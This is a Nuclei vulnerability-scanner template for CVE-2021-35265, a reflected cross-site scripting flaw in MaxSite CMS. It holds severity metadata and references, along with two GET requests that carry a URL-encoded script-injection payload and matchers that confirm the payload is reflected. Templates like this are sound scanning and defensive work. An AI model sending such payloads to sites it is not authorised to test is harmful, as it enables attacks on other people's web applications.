nuclei-templates/cves/2021/CVE-2021-35265.yaml

43 lines
1.2 KiB
YAML

id: CVE-2021-35265
info:
name: MaxSite CMS XSS
author: pikpikcu
severity: medium
description: A reflected cross-site scripting vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page."
reference:
- https://github.com/maxsite/cms/issues/414#issue-726249183
- https://nvd.nist.gov/vuln/detail/CVE-2021-35265
- https://github.com/maxsite/cms/commit/6b0ab1de9f3d471485d1347e800a9ce43fedbf1a
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-35265
cwe-id: CWE-79
tags: cve,cve2021,maxsite,xss
requests:
- method: GET
path:
- '{{BaseURL}}/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/03/24